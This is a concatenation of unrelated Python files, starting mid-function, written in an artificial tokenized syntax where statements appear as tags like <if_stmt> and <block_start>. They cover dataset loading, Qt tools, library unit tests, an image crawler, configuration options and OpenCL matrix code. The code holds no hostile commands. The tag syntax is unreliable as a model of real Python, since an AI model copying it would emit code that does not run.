self.fields.items()<block_start><try_stmt><block_start><if_stmt>self.cache_fields<block_start><if_stmt>self.split_model_for_images<block_start>idx_img=self.models[idx]['image_id']<block_end><else_stmt><block_start>idx_img=np.random.randint(0 self.n_views)<block_end>k='%s_%s_%d'%(model_path field_name idx_img)<if_stmt>k<in>self.cached_fields<block_start>field_data=self.cached_fields[k]<block_end><else_stmt><block_start>field_data=field.load(model_path idx c_idx input_idx_img=idx_img)<line_sep>self.cached_fields[k]=field_data<block_end><block_end><else_stmt><block_start><if_stmt>self.split_model_for_images<block_start>idx_img=self.models[idx]['image_id']<line_sep>field_data=field.load(model_path idx c_idx idx_img)<block_end><else_stmt><block_start>field_data=field.load(model_path idx c_idx)<block_end><block_end><block_end><except_stmt>Exception<block_start><if_stmt>self.no_except<block_start>logger.warn('Error occurred when loading field %s of model %s (%s)'%(field_name model category))<line_sep><return><none><block_end><else_stmt><block_start><raise><block_end><block_end><if_stmt>isinstance(field_data dict)<block_start><for_stmt>k,v field_data.items()<block_start><if_stmt>k<is><none><block_start>data[field_name]=v<block_end><else_stmt><block_start>data['%s.%s'%(field_name k)]=v<block_end><block_end><block_end><else_stmt><block_start>data[field_name]=field_data<block_end><block_end><if_stmt>self.transform<is><not><none><block_start>data=self.transform(data)<block_end><return>data<block_end><def_stmt>get_model_dict self idx<block_start><return>self.models[idx]<block_end><def_stmt>test_model_complete self category model<block_start>''' Tests if model is complete. Args: model (str): modelname '''<line_sep>model_path=os.path.join(self.dataset_folder category model)<line_sep>files=os.listdir(model_path)<for_stmt>field_name,field self.fields.items()<block_start><if_stmt><not>field.check_complete(files)<block_start>logger.warn('Field "%s" is incomplete: %s'%(field_name model_path))<line_sep><return><false><block_end><block_end><return><true><block_end><block_end><def_stmt>collate_remove_none batch<block_start>''' Collater that puts each data field into a tensor with outer dimension batch size. Args: batch: batch '''<line_sep>batch=list(filter(<lambda>x:x<is><not><none> batch))<line_sep><return>data.dataloader.default_collate(batch)<block_end><def_stmt>worker_init_fn worker_id<block_start>''' Worker init function to ensure true randomness. '''<line_sep>random_data=os.urandom(4)<line_sep>base_seed=int.from_bytes(random_data byteorder="big")<line_sep>np.random.seed(base_seed+worker_id)<block_end>
<import_from_future_stmt> absolute_import division print_function<import_stmt>os<import_from_stmt>idaskins UI_DIR<import_from_stmt>PyQt5 uic<import_from_stmt>PyQt5.Qt qApp<import_from_stmt>PyQt5.QtCore Qt<import_from_stmt>PyQt5.QtGui QCursor QFont QKeySequence<import_from_stmt>PyQt5.QtWidgets QShortcut QWidget<line_sep>Ui_ObjectInspector,ObjectInspectorBase=uic.loadUiType(os.path.join(UI_DIR 'ObjectInspector.ui'))<class_stmt>ObjectInspector(ObjectInspectorBase)<block_start>""" Rudimentary Qt object inspector. Allows for easier finding of object names and classes for usage in QSS stylesheets. """<def_stmt>__init__ self *args **kwargs<block_start>super(ObjectInspector self).__init__(*args **kwargs)<line_sep>self._selected_widget=<none><line_sep>self._ui=Ui_ObjectInspector()<line_sep>self._ui.setupUi(self)<line_sep># Make everything monospace. font=QFont('Monospace')<line_sep>font.setStyleHint(QFont.TypeWriter)<line_sep>self._ui.teInspectionResults.setFont(font)<line_sep># Register signals. self._update_key=QShortcut(QKeySequence(Qt.Key_F7) self)<line_sep>self._ui.btnSelectParent.released.connect(self.select_parent)<line_sep>self._update_key.activated.connect(self.update_inspection)<block_end><def_stmt>update_inspection self<block_start>widget=qApp.widgetAt(QCursor.pos())<line_sep>self.update_selected_widget(widget)<block_end><def_stmt>select_parent self<block_start><if_stmt>self._selected_widget<block_start>parent=self._selected_widget.parent()<if_stmt>parent<and>parent.inherits('QWidget')<block_start>self.update_selected_widget(parent)<block_end><block_end><block_end><def_stmt>update_selected_widget self widget<block_start><if_stmt>self._selected_widget<block_start>self._selected_widget.destroyed.disconnect(self.on_selected_widget_destroyed)<block_end>self._selected_widget=widget<if_stmt>widget<block_start>self._ui.btnSelectParent.setEnabled(widget.parent()<is><not><none>)<line_sep>self._ui.teInspectionResults.setText(("Type: {}\n"<concat>"Name: {}\n"<concat>"Number of children: {}\n"<concat>"QSS: {}").format(widget.metaObject().className() widget.objectName()<or>'<none>' len(widget.children()) widget.styleSheet()<or>'<none>' ))<line_sep>self._selected_widget.destroyed.connect(self.on_selected_widget_destroyed)<block_end><else_stmt><block_start>self._ui.teInspectionResults.setText('<no object under cursor>')<block_end><block_end><def_stmt>on_selected_widget_destroyed self obj<block_start>self._selected_widget=<none><block_end><block_end>
# -*- coding: utf-8 -*- <import_from_stmt>redis StrictRedis<import_from_stmt>rq.queue Queue<import_from_stmt>rq.utils import_attribute<import_from_stmt>rq.worker Worker<import_from_stmt>rq_scheduler Scheduler<import_stmt>pytest<import_from_stmt>flask_rq2 RQ<def_stmt>exception_handler *args **kwargs<block_start><pass><block_end><def_stmt>test_init_app app config<block_start>rq=RQ()<assert_stmt>'rq2'<not><in>getattr(app 'extensions' {})<assert_stmt>getattr(rq 'module' <none>)<is><none><line_sep>rq.init_app(app)<assert_stmt>rq.redis_url<eq>config.RQ_REDIS_URL<assert_stmt>isinstance(rq.connection StrictRedis)<assert_stmt>'rq2'<in>getattr(app 'extensions' {})<block_end><def_stmt>test_rq_outside_flask <block_start>rq=RQ()<assert_stmt>pytest.raises(RuntimeError <lambda>:rq.connection)<block_end><def_stmt>test_config_redis config rq<block_start><assert_stmt>rq.redis_url<eq>config.RQ_REDIS_URL<assert_stmt>isinstance(rq.connection StrictRedis)<block_end><def_stmt>test_config_queues config rq<block_start><assert_stmt>rq.queues<eq>config.RQ_QUEUES<block_end><def_stmt>test_config_async app config rq<block_start><assert_stmt>rq._is_async<eq>config.RQ_ASYNC<block_end><def_stmt>test_config_async_override app config rq<block_start>rq2=RQ(app is_async=<not>config.RQ_ASYNC)<assert_stmt>rq2._is_async<ne>config.RQ_ASYNC<block_end><def_stmt>test_config_default_timeout app config<block_start>rq3=RQ(app default_timeout=911)<assert_stmt>rq3.default_timeout<ne>Queue.DEFAULT_TIMEOUT<assert_stmt>rq3.default_timeout<eq>911<block_end><def_stmt>test_config_scheduler_interval config rq<block_start>rq.scheduler_interval<eq>config.RQ_SCHEDULER_INTERVAL<block_end><def_stmt>test_config_scheduler_queue config rq<block_start>rq.scheduler_queue=config.RQ_SCHEDULER_QUEUE<block_end><def_stmt>test_exception_handler rq<block_start>rq.exception_handler(exception_handler)<assert_stmt>'test_app.exception_handler'<in>rq._exception_handlers<block_end><def_stmt>test_get_worker rq<block_start>worker=rq.get_worker()<assert_stmt>isinstance(worker Worker)<assert_stmt>[queue.name<for>queue worker.queues]<eq>rq.queues<block_end><def_stmt>test_get_worker_with_queues rq<block_start>worker=rq.get_worker('some-queue')<assert_stmt>isinstance(worker Worker)<line_sep>queue_names=[queue.name<for>queue worker.queues]<assert_stmt>queue_names<ne>rq.queues<assert_stmt>'some-queue'<in>queue_names<block_end><def_stmt>test_get_worker_with_exception_handlers rq<block_start>rq.exception_handler(exception_handler)<line_sep>worker=rq.get_worker()<assert_stmt>exception_handler<in>worker._exc_handlers<block_end><def_stmt>test_get_queue rq<block_start><assert_stmt>rq._queue_instances<eq>{}<line_sep>queue=rq.get_queue()<assert_stmt>rq._queue_instances<ne>{}<assert_stmt>queue<in>rq._queue_instances.values()<assert_stmt>isinstance(queue Queue)<assert_stmt>isinstance(queue import_attribute(rq.queue_class))<assert_stmt>queue.name<eq>rq.default_queue<assert_stmt>queue._default_timeout<eq>rq.default_timeout<assert_stmt>queue._is_async<eq>rq._is_async<assert_stmt>queue.connection<eq>rq.connection<block_end><def_stmt>test_get_queue_with_name rq<block_start>queue=rq.get_queue('some-queue')<assert_stmt>queue.name<eq>'some-queue'<assert_stmt>queue.name<in>rq._queue_instances<line_sep>name2='some-other-queue'<assert_stmt>name2<not><in>rq._queue_instances<line_sep>queue2=rq.get_queue(name2)<assert_stmt>queue2.name<eq>name2<assert_stmt>name2<in>rq._queue_instances<block_end><def_stmt>test_get_scheduler rq<block_start>scheduler=rq.get_scheduler()<assert_stmt>isinstance(scheduler Scheduler)<assert_stmt>isinstance(scheduler import_attribute(rq.scheduler_class))<assert_stmt>scheduler.queue_name<eq>rq.scheduler_queue<assert_stmt>scheduler._interval<eq>rq.scheduler_interval<assert_stmt>scheduler.connection<eq>rq.connection<block_end><def_stmt>test_get_scheduler_interval rq<block_start>scheduler=rq.get_scheduler(interval=23)<assert_stmt>scheduler._interval<ne>rq.scheduler_interval<assert_stmt>scheduler._interval<eq>23<block_end><def_stmt>test_get_scheduler_queue rq<block_start>scheduler=rq.get_scheduler(queue='other')<assert_stmt>scheduler.queue_name<eq>'other'<block_end><def_stmt>test_get_scheduler_importerror rq# in case scheduler can't be imported <block_start>rq.scheduler_class='non.existing.Scheduler'<with_stmt>pytest.raises(ImportError)<block_start>rq.get_scheduler()<block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>copy<import_from_stmt>unittest TestCase<import_from_stmt>unittest.mock Mock call patch<import_stmt>torch<import_from_stmt>steganogan decoders<import_from_stmt>tests.utils assert_called_with_tensors<class_stmt>TestBasicDecoder(TestCase)<block_start><class_stmt>TestDecoder(decoders.BasicDecoder)<block_start><def_stmt>__init__ self<block_start><pass><block_end><block_end><def_stmt>setUp self<block_start>self.test_decoder=self.TestDecoder()<block_end>@patch('steganogan.decoders.nn.Conv2d' autospec=<true>)<def_stmt>test__covn2d self conv2d_mock<block_start>"""Conv2d must be called with given args and kernel_size=3 and padding=1"""<line_sep># run result=self.test_decoder._conv2d(2 4)<line_sep># asserts <assert_stmt>result<eq>conv2d_mock.return_value<line_sep>conv2d_mock.assert_called_once_with(in_channels=2 out_channels=4 kernel_size=3 padding=1)<block_end>@patch('steganogan.decoders.nn.Sequential')@patch('steganogan.decoders.nn.Conv2d')@patch('steganogan.decoders.nn.BatchNorm2d')<def_stmt>test___init__ self batchnorm_mock conv2d_mock sequential_mock<block_start>"""Test the init params and that the layers are created correctly"""<line_sep># run decoders.BasicDecoder(2 5)<line_sep># assert expected_batch_calls=[call(5) call(5) call(5)]<assert_stmt>batchnorm_mock.call_args_list<eq>expected_batch_calls<line_sep>expected_conv_calls=[call(in_channels=3 out_channels=5 kernel_size=3 padding=1) call(in_channels=5 out_channels=5 kernel_size=3 padding=1) call(in_channels=5 out_channels=5 kernel_size=3 padding=1) call(in_channels=5 out_channels=2 kernel_size=3 padding=1) ]<assert_stmt>conv2d_mock.call_args_list<eq>expected_conv_calls<block_end><def_stmt>test_upgrade_legacy_without_version self<block_start>"""Upgrade legacy must create self._models from conv1, conv2, conv3, conv4"""<line_sep># setup self.test_decoder.layers=Mock(return_value=torch.Tensor([[5 6] [7 8]]))<line_sep># run self.test_decoder.upgrade_legacy()<line_sep># assert <assert_stmt>self.test_decoder._models<eq>[self.test_decoder.layers]<assert_stmt>self.test_decoder.version<eq>'1'<block_end>@patch('steganogan.decoders.nn.Sequential' autospec=<true>)<def_stmt>test_upgrade_legacy_with_version_1 self sequential_mock<block_start>"""The object must be the same and not changed by the method"""<line_sep># setup decoder=decoders.BasicDecoder(1 1)<line_sep>expected=copy.deepcopy(decoder)<line_sep># run decoder.upgrade_legacy()<line_sep># assert <assert_stmt>decoder.__dict__<eq>expected.__dict__<block_end><def_stmt>test_forward_1_layer self<block_start>"""If there is only one layer it must be called with image as the only argument."""<line_sep># setup layer1=Mock(return_value=torch.Tensor([[5 6] [7 8]]))<line_sep>self.test_decoder._models=[layer1]<line_sep># run image=torch.Tensor([[1 2] [3 4]])<line_sep>result=self.test_decoder.forward(image)<line_sep># assert <assert_stmt>(result<eq>torch.Tensor([[5 6] [7 8]])).all()<line_sep>call_1=call(torch.Tensor([[1 2] [3 4]]))<line_sep>assert_called_with_tensors(layer1 [call_1])<block_end><def_stmt>test_forward_more_than_2_layers self<block_start>"""If there are more than 2 layers, they must be called adding data to each result"""<line_sep># setup layer1=Mock(return_value=torch.Tensor([[5 6] [7 8]]))<line_sep>layer2=Mock(return_value=torch.Tensor([[9 10] [11 12]]))<line_sep>layer3=Mock(return_value=torch.Tensor([[13 14] [15 16]]))<line_sep>self.test_decoder._models=[layer1 layer2 layer3]<line_sep># run image=torch.Tensor([[1 2] [3 4]])<line_sep>result=self.test_decoder.forward(image)<line_sep># asserts call_layer_1=call(torch.Tensor([[1 2] [3 4]]))<line_sep>call_layer_2=call(torch.Tensor([[5 6] [7 8]]))<line_sep>call_layer_3=call(torch.Tensor([[5 6 9 10] [7 8 11 12]]))<line_sep>assert_called_with_tensors(layer1 [call_layer_1])<line_sep>assert_called_with_tensors(layer2 [call_layer_2])<line_sep>assert_called_with_tensors(layer3 [call_layer_3])<assert_stmt>(result<eq>torch.Tensor([[13 14] [15 16]])).all()<block_end><block_end><class_stmt>TestDenseDecoder(TestCase)<block_start><class_stmt>TestDecoder(decoders.DenseDecoder)<block_start><def_stmt>__init__ self<block_start><pass><block_end><block_end><def_stmt>test_upgrade_legacy_without_version self<block_start>"""Upgrade legacy must create self._models from conv1, conv2, conv3, conv4"""<line_sep># setup test_decoder=self.TestDecoder()# instance an empty decoder test_decoder.conv1=Mock(return_value=torch.Tensor([[5 6] [7 8]]))<line_sep>test_decoder.conv2=Mock(return_value=torch.Tensor([[9 10] [11 12]]))<line_sep>test_decoder.conv3=Mock(return_value=torch.Tensor([[13 14] [15 16]]))<line_sep>test_decoder.conv4=Mock(return_value=torch.Tensor([[17 18] [19 20]]))<line_sep># run test_decoder.upgrade_legacy()<line_sep># assert expected_models=[test_decoder.conv1 test_decoder.conv2 test_decoder.conv3 test_decoder.conv4 ]<assert_stmt>test_decoder._models<eq>expected_models<assert_stmt>test_decoder.version<eq>'1'<block_end>@patch('steganogan.decoders.nn.Sequential' autospec=<true>)<def_stmt>test_upgrade_legacy_with_version_1 self sequential_mock<block_start>"""The object must be the same and not changed by the method"""<line_sep># setup decoder=decoders.DenseDecoder(1 1)<line_sep>expected=copy.deepcopy(decoder)<line_sep># run decoder.upgrade_legacy()<line_sep># assert <assert_stmt>decoder.__dict__<eq>expected.__dict__<block_end>@patch('steganogan.decoders.nn.Sequential')@patch('steganogan.decoders.nn.Conv2d')@patch('steganogan.decoders.nn.BatchNorm2d')<def_stmt>test___init__ self batchnorm_mock conv2d_mock sequential_mock<block_start>"""Test the init params and that the layers are created correctly"""<line_sep># run decoders.DenseDecoder(2 5)<line_sep># assert expected_batch_calls=[call(5) call(5) call(5)]<assert_stmt>batchnorm_mock.call_args_list<eq>expected_batch_calls<line_sep>expected_conv_calls=[call(in_channels=3 out_channels=5 kernel_size=3 padding=1) call(in_channels=5 out_channels=5 kernel_size=3 padding=1) call(in_channels=10 out_channels=5 kernel_size=3 padding=1) call(in_channels=15 out_channels=2 kernel_size=3 padding=1) ]<assert_stmt>conv2d_mock.call_args_list<eq>expected_conv_calls<block_end><block_end>
<import_from_stmt>funboost boost<import_stmt>re<import_stmt>requests<import_from_stmt>parsel Selector<import_from_stmt>pathlib Path<line_sep>""" http://www.5442tu.com/mingxing/list_2_1.html 下载所有明星图片 """<line_sep>@boost('xiaoxianrou_list_page' qps=0.05)<def_stmt>cralw_list_page page_index<block_start>url=f'http://www.5442tu.com/mingxing/list_2_{page_index}.html'<line_sep>resp=requests.get(url)<line_sep>sel=Selector(resp.content.decode('gbk'))<line_sep>detail_sels=sel.xpath('//div[@class="imgList2"]/ul/li/a[1]')<for_stmt>detail_sel detail_sels<block_start>crawl_detail_page.push(detail_sel.xpath('./@href').extract_first() detail_sel.xpath('./@title').extract_first() 1 is_first_picture=<true>)<block_end><block_end>@boost('xiaoxianrou_detail_page' qps=2 do_task_filtering=<true>)<def_stmt>crawl_detail_page url title picture_index is_first_picture=<false> <block_start>resp=requests.get(url)<line_sep>sel=Selector(resp.content.decode('gbk'))<if_stmt>is_first_picture# 详情页图册也需要翻页。 <block_start>total_page_str=sel.xpath('//div[@class="page"]/ul/li/a/text()').extract_first()<line_sep>total_page=int(re.search(r'共(\d+)页' total_page_str).group(1))<for_stmt>p range(2 total_page+1)<block_start>next_pic_page_url=url[:-5]+f'_{p}.html'<line_sep>crawl_detail_page.push(next_pic_page_url title picture_index=p)<block_end><block_end>pic_url=sel.xpath('//p[@align="center"]/a/img/@src').extract_first()<line_sep>resp_pic=requests.get(pic_url)<line_sep>Path(f'./pictures/{title}/').mkdir(parents=<true> exist_ok=<true>)<line_sep>(Path(f'./pictures/{title}/')/Path(f'./{title}_{picture_index}.jpg')).write_bytes(resp_pic.content)# 保存图片。 print(f'''保存图片成功:\n {(Path(f'./pictures/{title}/')/Path(f'./{title}_{picture_index}.jpg')).absolute()} ''')<block_end><if_stmt>__name__<eq>'__main__'# cralw_list_page(1) # crawl_detail_page('https://www.5442tu.com/mingxing/20181105/78924.html','范冰冰弟弟范丞丞阳光帅气明星壁纸图片高清',1,True) <block_start>cralw_list_page.clear()<line_sep>crawl_detail_page.clear()<for_stmt>p range(1 10)<block_start>cralw_list_page.push(p)<block_end>cralw_list_page.consume()<line_sep>crawl_detail_page.consume()<block_end>
<import_from_stmt>blaze.expr symbol<import_stmt>numpy<as>np<import_from_stmt>datashape dshape isscalar<def_stmt>test_array_dshape <block_start>x=symbol('x' '5 * 3 * float32')<assert_stmt>x.shape<eq>(5 3)<assert_stmt>x.schema<eq>dshape('float32')<assert_stmt>len(x)<eq>5<assert_stmt>x.ndim<eq>2<block_end><def_stmt>test_element <block_start>x=symbol('x' '5 * 3 * float32')<assert_stmt>isscalar(x[1 2].dshape)<assert_stmt>x[1 2].dshape<eq>dshape('float32')<assert_stmt>str(x[1 2])<eq>'x[1, 2]'<line_sep>x=symbol('x' '5 * float32')<assert_stmt>isscalar(x[3].dshape)<block_end><def_stmt>test_slice <block_start>x=symbol('x' '5 * 3 * {name: string, amount: float32}')<assert_stmt>x[2: 0].dshape<eq>dshape('3 * {name: string, amount: float32}')<assert_stmt>x[2:].dshape<eq>x[2: :].dshape<line_sep># Make sure that these are hashable hash(x[:2])<line_sep>hash(x[0 :2])<assert_stmt>str(x[1])<eq>'x[1]'<assert_stmt>str(x[:2])<eq>'x[:2]'<assert_stmt>str(x[0 :2])<eq>'x[0, :2]'<assert_stmt>str(x[1:4:2 :2])<eq>'x[1:4:2, :2]'<block_end><def_stmt>test_negative_slice <block_start>x=symbol('x' '10 * 10 * int32')<assert_stmt>x[:5 -3:].shape<eq>(5 3)<block_end><def_stmt>test_None_slice <block_start>x=symbol('x' '10 * 10 * int32')<assert_stmt>x[:5 <none> -3:].shape<eq>(5 1 3)<block_end><def_stmt>test_list_slice <block_start>x=symbol('x' '10 * 10 * int32')<assert_stmt>x[[1 2 3] [4 5]].shape<eq>(3 2)<block_end><def_stmt>test_list_slice_string <block_start>x=symbol('x' '10 * 10 * int32')<assert_stmt>str(x[[1 2 3]])<eq>"x[[1, 2, 3]]"<block_end><def_stmt>test_slice_with_boolean_list <block_start>x=symbol('x' '5 * int32')<line_sep>expr=x[[<true> <false> <false> <true> <false>]]<assert_stmt>expr.index<eq>([0 3] )<block_end><def_stmt>test_slice_with_numpy_array <block_start>x=symbol('x' '2 * int32')<assert_stmt>x[np.array([<true> <false>])].isidentical(x[[<true> <false>]])<block_end>
# Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # Copyright 2011 <NAME> # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. <import_from_stmt>oslo_config cfg<line_sep>base_options=[cfg.IntOpt('password_length' default=12 min=0 help='Length of generated instance admin passwords.') cfg.StrOpt('instance_usage_audit_period' default='month' regex='^(hour|month|day|year)(@([0-9]+))?$' help=''' Time period to generate instance usages for. It is possible to define optional offset to given period by appending @ character followed by a number defining offset. Possible values: * period, example: ``hour``, ``day``, ``month` or ``year`` * period with offset, example: ``month@15`` will result in monthly audits starting on 15th day of month. ''') cfg.BoolOpt('use_rootwrap_daemon' default=<false> help=''' Start and use a daemon that can run the commands that need to be run with root privileges. This option is usually enabled on nodes that run nova compute processes. ''') cfg.StrOpt('rootwrap_config' default="/etc/nova/rootwrap.conf" help=''' Path to the rootwrap configuration file. Goal of the root wrapper is to allow a service-specific unprivileged user to run a number of actions as the root user in the safest manner possible. The configuration file used here must match the one defined in the sudoers entry. ''') cfg.StrOpt('tempdir' help='Explicitly specify the temporary working directory.') ]<def_stmt>register_opts conf<block_start>conf.register_opts(base_options)<block_end><def_stmt>list_opts <block_start><return>{'DEFAULT':base_options}<block_end>
# openpoiservice/server/categories.py <import_stmt>yaml<import_stmt>os<import_stmt>copy<class_stmt>CategoryTools(object)<block_start><def_stmt>__init__ self categories_file<block_start>self.basedir=os.path.abspath(os.path.dirname(__file__))<line_sep>self.categories_object=yaml.safe_load(open(os.path.join(self.basedir categories_file)))<line_sep>self.category_group_ids=[]<line_sep>self.category_ids=[]<line_sep>self.group_index={}<line_sep>self.category_to_group_index={}<line_sep>self.category_index={}<line_sep>self.category_ids_index={}<line_sep>self.generate_category_indices()<block_end><def_stmt>unify_categories self filters<block_start>category_ids_of_group=[]<if_stmt>'category_group_ids'<in>filters<block_start><for_stmt>group_id filters['category_group_ids']<block_start><if_stmt>group_id<in>self.group_index<block_start>category_ids_of_group.extend(self.group_index[group_id])<block_end><block_end><block_end><if_stmt>'category_ids'<in>filters<block_start>in_first=set(category_ids_of_group)<line_sep>in_second=set(filters['category_ids'])<line_sep>in_second_but_not_in_first=in_second-in_first<line_sep>result=category_ids_of_group+list(in_second_but_not_in_first)<line_sep><return>result<block_end><return>category_ids_of_group<block_end><def_stmt>generate_category_indices self<block_start><for_stmt>k,v copy.deepcopy(self.categories_object).items()<block_start>group_name=k<line_sep>group_id=v['id']<line_sep>self.group_index[group_id]=[]<line_sep>self.category_group_ids.append(int(group_id))<line_sep>group_children=v['children']<for_stmt>tag_name,pois group_children.items()<block_start><if_stmt>tag_name<in>self.category_index<block_start>self.category_index[tag_name].update(pois)<block_end><else_stmt><block_start>self.category_index[tag_name]=pois<block_end><for_stmt>poi,cat_id pois.items()<block_start>self.category_ids_index[cat_id]={'poi_name':poi 'poi_group':group_name}<line_sep>self.category_ids.append(int(cat_id))<line_sep>self.group_index[group_id].append(int(cat_id))<if_stmt>cat_id<not><in>self.category_to_group_index<block_start>self.category_to_group_index[cat_id]={'group_id':v['id'] 'group_name':k}<block_end><block_end><block_end><block_end><block_end><def_stmt>get_category self tags<block_start>categories=[]<if_stmt>bool(tags)<block_start><for_stmt>tag_name,tag_value tags.items()<block_start><if_stmt>tag_name<and>tag_name<in>self.category_index<and>tag_value<in>self.category_index[tag_name]<block_start>category_id=self.category_index[tag_name][tag_value]<if_stmt>category_id<g>0<block_start>categories.append(category_id)<block_end><block_end><block_end><block_end><return>categories<block_end><block_end>
# -*- coding: utf-8 -*- <import_from_stmt>functools cached_property<import_stmt>numpy<as>np<import_stmt>pyfr.backends.base<as>base<class_stmt>_OpenCLMatrixCommon<block_start>@cached_property<def_stmt>_as_parameter_ self<block_start><return>int(self.data)<block_end><block_end><class_stmt>OpenCLMatrixBase(_OpenCLMatrixCommon base.MatrixBase)<block_start><def_stmt>onalloc self basedata offset<block_start>self.basedata=basedata<line_sep>self.offset=offset<line_sep># If necessary, slice the buffer <if_stmt>offset<block_start>self.data=basedata.slice(offset self.nbytes)<block_end><else_stmt><block_start>self.data=basedata<block_end># Process any initial value <if_stmt>self._initval<is><not><none><block_start>self._set(self._initval)<block_end># Remove <del_stmt>self._initval<block_end><def_stmt>_get self# Allocate an empty buffer <block_start>buf=np.empty((self.nrow self.leaddim) dtype=self.dtype)<line_sep># Copy self.backend.queue.barrier()<line_sep>self.backend.cl.memcpy(self.backend.queue buf self.data self.nbytes blocking=<true>)<line_sep># Unpack <return>self._unpack(buf[<none> : :])<block_end><def_stmt>_set self ary<block_start>buf=self._pack(ary)<line_sep># Copy self.backend.queue.barrier()<line_sep>self.backend.cl.memcpy(self.backend.queue self.data buf self.nbytes blocking=<true>)<block_end><block_end><class_stmt>OpenCLMatrixSlice(_OpenCLMatrixCommon base.MatrixSlice)<block_start>@cached_property<def_stmt>data self<block_start><if_stmt>self.offset<block_start>nbytes=((self.nrow-1)<times>self.leaddim+self.ncol)<times>self.itemsize<line_sep><return>self.basedata.slice(self.offset nbytes)<block_end><else_stmt><block_start><return>self.basedata<block_end><block_end><block_end><class_stmt>OpenCLMatrix(OpenCLMatrixBase base.Matrix)<block_start><pass><block_end><class_stmt>OpenCLConstMatrix(OpenCLMatrixBase base.ConstMatrix)<block_start><pass><block_end><class_stmt>OpenCLView(base.View)<block_start><pass><block_end><class_stmt>OpenCLXchgView(base.XchgView)<block_start><pass><block_end><class_stmt>OpenCLXchgMatrix(OpenCLMatrix base.XchgMatrix)<block_start><def_stmt>__init__ self backend ioshape initval extent aliases tags<block_start>super().__init__(backend ioshape initval extent aliases tags)<line_sep># Allocate an empty buffer on the host for MPI to send/recv from shape,dtype=(self.nrow self.ncol) self.dtype<line_sep>self.hdata=backend.cl.pagelocked_empty(shape dtype)<block_end><block_end><class_stmt>OpenCLGraph(base.Graph)<block_start><def_stmt>commit self<block_start>super().commit()<line_sep># Map from kernels to event table locations evtidxs={}<line_sep># Kernel list complete with dependency information self.klist=klist=[]<for_stmt>i,k enumerate(self.knodes)<block_start>evtidxs[k]=i<line_sep># Resolve the event indices of kernels we depend on wait_evts=[evtidxs[dep]<for>dep self.kdeps[k]]<or><none><line_sep>klist.append((k wait_evts k<in>self.depk))<block_end># Dependent MPI request list self.mreqlist=mreqlist=[]<for_stmt>req,deps zip(self.mpi_reqs self.mpi_req_deps)<block_start><if_stmt>deps<block_start>mreqlist.append((req [evtidxs[dep]<for>dep deps]))<block_end><block_end><block_end><def_stmt>run self queue<block_start><import_from_stmt>mpi4py MPI<line_sep>events=[<none>]<times>len(self.klist)<line_sep>wait_for_events=self.backend.cl.wait_for_events<line_sep># Submit the kernels to the queue <for_stmt>i,(k wait_for ret_evt) enumerate(self.klist)<block_start><if_stmt>wait_for<is><not><none><block_start>wait_for=[events[j]<for>j wait_for]<block_end>events[i]=k.run(queue wait_for ret_evt)<block_end># Flush the queue to ensure the kernels have started queue.flush()<line_sep># Start all dependency-free MPI requests MPI.Prequest.Startall(self.mpi_root_reqs)<line_sep># Start any remaining requests once their dependencies are satisfied <for_stmt>req,wait_for self.mreqlist<block_start>wait_for_events([events[j]<for>j wait_for])<line_sep>req.Start()<block_end># Wait for all of the MPI requests to finish MPI.Prequest.Waitall(self.mpi_reqs)<block_end><block_end>
<import_from_stmt>PyQt4 QtGui QtCore<import_from_stmt>PyQt4.QtCore Qt<class_stmt>Table(QtGui.QDialog)<block_start><def_stmt>__init__ self parent=<none><block_start>QtGui.QDialog.__init__(self parent)<line_sep>self.parent=parent<line_sep>self.initUI()<block_end><def_stmt>initUI self# Rows <block_start>rowsLabel=QtGui.QLabel("Rows: " self)<line_sep>self.rows=QtGui.QSpinBox(self)<line_sep># Columns colsLabel=QtGui.QLabel("Columns" self)<line_sep>self.cols=QtGui.QSpinBox(self)<line_sep># Cell spacing (distance between cells) spaceLabel=QtGui.QLabel("Cell spacing" self)<line_sep>self.space=QtGui.QSpinBox(self)<line_sep># Cell padding (distance between cell and inner text) padLabel=QtGui.QLabel("Cell padding" self)<line_sep>self.pad=QtGui.QSpinBox(self)<line_sep>self.pad.setValue(10)<line_sep># Button insertButton=QtGui.QPushButton("Insert" self)<line_sep>insertButton.clicked.connect(self.insert)<line_sep># Layout layout=QtGui.QGridLayout()<line_sep>layout.addWidget(rowsLabel 0 0)<line_sep>layout.addWidget(self.rows 0 1)<line_sep>layout.addWidget(colsLabel 1 0)<line_sep>layout.addWidget(self.cols 1 1)<line_sep>layout.addWidget(padLabel 2 0)<line_sep>layout.addWidget(self.pad 2 1)<line_sep>layout.addWidget(spaceLabel 3 0)<line_sep>layout.addWidget(self.space 3 1)<line_sep>layout.addWidget(insertButton 4 0 1 2)<line_sep>self.setWindowTitle("Insert Table")<line_sep>self.setGeometry(300 300 200 100)<line_sep>self.setLayout(layout)<block_end><def_stmt>insert self<block_start>cursor=self.parent.text.textCursor()<line_sep># Get the configurations rows=self.rows.value()<line_sep>cols=self.cols.value()<if_stmt><not>rows<or><not>cols<block_start>popup=QtGui.QMessageBox(QtGui.QMessageBox.Warning "Parameter error" "Row and column numbers may not be zero!" QtGui.QMessageBox.Ok self)<line_sep>popup.show()<block_end><else_stmt><block_start>padding=self.pad.value()<line_sep>space=self.space.value()<line_sep># Set the padding and spacing fmt=QtGui.QTextTableFormat()<line_sep>fmt.setCellPadding(padding)<line_sep>fmt.setCellSpacing(space)<line_sep># Inser the new table cursor.insertTable(rows cols fmt)<line_sep>self.close()<block_end><block_end><block_end>
